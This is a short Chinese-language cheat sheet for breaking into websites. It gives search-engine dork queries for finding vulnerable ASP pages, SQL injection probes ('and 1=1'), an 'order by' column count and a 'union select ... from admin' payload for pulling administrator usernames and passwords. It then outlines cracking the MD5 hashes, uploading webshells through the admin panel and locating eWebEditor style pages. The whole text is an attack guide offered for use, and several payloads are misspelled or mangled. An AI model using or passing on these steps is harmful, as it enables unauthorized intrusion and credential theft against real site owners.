inurl:CompHonorBig.asp?id=
inurl:asp?id=
-----------------------------------百度---谷歌------以上是搜索关键词----------------------------------------------
adn 1=1
adn 1=2
-----------------------------------检测网站是否有注入漏洞----------------------------------------------------------
order b*X 查询字段
我推荐下，大部分网站一般都是 10个表一下 也有 20 的。
查询的时候 我个人比较喜欢从15开始查询
-----------------------------------这个是查询字段的-------------------------------------------------------------------
union * 这里是你查询出来的表 用数字表示如下 from admin
union * 1,2,3,4,5,6,7,8,9,10 from admin
-----------------------------------这个是查询字段的-------------------------------------------------------------------
网站的帐号密码表部分都是 帐号表：username 密码表：password
-----------------------------------获取到了管理员的MD5-------------------------------------------------------------
获取到了MD5之后怎么办，当然是爆它菊花了。
在它后台上传小马，在从小马传大马， 拿shell
-----------------------------------样式管理------------------------------------------------------------------------------
这个是找样式管理的连接：ewebeditor 网页文本搜索
样式管理Southidceditor/admin_style.asp 这个不是都一样的，自己查找